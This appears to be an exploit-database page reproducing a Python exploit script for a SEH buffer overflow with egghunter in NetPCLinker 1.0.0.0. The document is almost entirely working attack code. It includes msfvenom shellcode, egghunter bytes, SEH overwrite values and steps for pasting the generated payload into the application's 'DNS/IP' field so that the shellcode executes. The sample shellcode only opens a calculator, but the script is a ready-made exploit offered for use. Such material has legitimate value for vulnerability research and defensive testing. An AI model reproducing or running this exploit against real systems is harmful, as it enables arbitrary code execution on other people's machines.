Exploit for NetPCLinker 1.0.0.0 Buffer Overflow

Name: Exploit for NetPCLinker 1.0.0.0 Buffer Overflow
Rating: 5 (130 reviews)
2020-06-29 | CVSS 0.7
## https://sploitus.com/exploit?id=PACKETSTORM:158235
#!/usr/bin/python  
# Exploit Title: NetPCLinker 1.0.0.0 Buffer Overflow (SEH Egghunter)  
# Date: 2019-06-28  
# Exploit Author: Saeed reza Zamanian  
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/  
# Software Link: https://sourceforge.net/projects/netpclinker/files/  
# Version: 1.0.0.0  
# Tested on: Windows Vista SP1  
'''  
# Replicate Crash:  
1) Install and Run the application  
2) Go to second tab "Clients Control Panel"  
3) Press Add button  
4) Run the exploit , the exploit creates a text file named payload.txt  
5) Copy payload.txt contents into the add client dialog , "DNS/IP" field  
6) Press OK . Your shellcode will be executed by pressing OK button.  
  
'''  
  
#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"  
#Bad Characters : \x0a\x0d\x33\x35\x36  
  
shellcode = (  
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"  
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"  
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"  
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"  
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"  
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"  
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"  
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"  
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"  
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"  
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"  
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"  
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"  
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"  
"\x44\xbf\x0f\x56\x04\x40"  
)  
  
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
nSEH = '\xEB\xAA\x90\x90' #Jump Back  
  
# (Vista)  
# PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe]   
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)  
  
SEH = '\x67\x4b\x49'  
offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)  
  
payload = offset+egghunter+"\x90"*50+nSEH+SEH  
  
try:  
f=open("payload.txt","w")  
print("[+] Creating %s bytes payload." %len(payload))  
f.write(payload)  
f.close()  
print("[+] File created!")  
except:  
print("File cannot be created.")